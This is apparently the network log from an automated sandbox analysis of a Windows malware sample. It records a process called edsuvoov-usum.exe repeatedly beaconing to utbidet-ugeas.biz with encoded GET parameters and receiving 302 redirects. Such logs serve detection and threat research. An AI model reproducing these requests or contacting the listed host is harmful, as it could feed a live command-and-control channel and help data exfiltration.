                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.349713172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:01.104079962 CEST169OUTGET /d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:01.586461067 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:01 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.349714172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:01.592946053 CEST201OUTGET /d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:02.076724052 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:02 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0224E513A724E513A716E53FA724E59D74B0DDBBFD25E5D30F26E6258916CB2A9514D53DA7
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.349716172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:02.415241003 CEST169OUTGET /d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:02.895457029 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:02 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.349717172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:02.901575089 CEST201OUTGET /d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:03.385803938 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:03 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C821
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.349719172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:03.569951057 CEST169OUTGET /d/N?0254F4433754F4433766F46F3754F4CDE4C0CCEB6D55F4839F56F7751966DA7A0564C46D37 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:04.059454918 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:04 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0254F4433754F4433766F46F3754F4CDE4C0CCEB6D55F4839F56F7751966DA7A0564C46D37
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.349720172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:04.065726995 CEST201OUTGET /d/N?0254F4433754F4433766F46F3754F4CDE4C0CCEB6D55F4839F56F7751966DA7A0564C46D37 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:04.549241066 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:04 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0254F4433754F4433766F46F3754F4CDE4C0CCEB6D55F4839F56F7751966DA7A0564C46D37
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.349722172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:06.601445913 CEST169OUTGET /d/N?02883DBC9B8F3DBC9BBA3D949B883D32481C0514C1893D7C338A3E8AB5BA1385A9B80D929B HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:07.093805075 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:07 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02883DBC9B8F3DBC9BBA3D949B883D32481C0514C1893D7C338A3E8AB5BA1385A9B80D929B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.349723172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:07.105074883 CEST201OUTGET /d/N?02883DBC9B8F3DBC9BBA3D949B883D32481C0514C1893D7C338A3E8AB5BA1385A9B80D929B HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:07.602106094 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:07 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02883DBC9B8F3DBC9BBA3D949B883D32481C0514C1893D7C338A3E8AB5BA1385A9B80D929B
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.349725172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:08.398993969 CEST169OUTGET /d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:08.884773016 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:08 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            11192.168.2.349727172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:08.895874977 CEST201OUTGET /d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.377194881 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:09 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553E25
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            12192.168.2.349729172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:09.820045948 CEST169OUTGET /d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.293497086 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            13192.168.2.349730172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.299624920 CEST201OUTGET /d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.782083988 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:10 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2342
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            14192.168.2.349732172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:34:10.944789886 CEST169OUTGET /d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:34:11.429979086 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:34:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BCDD5
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
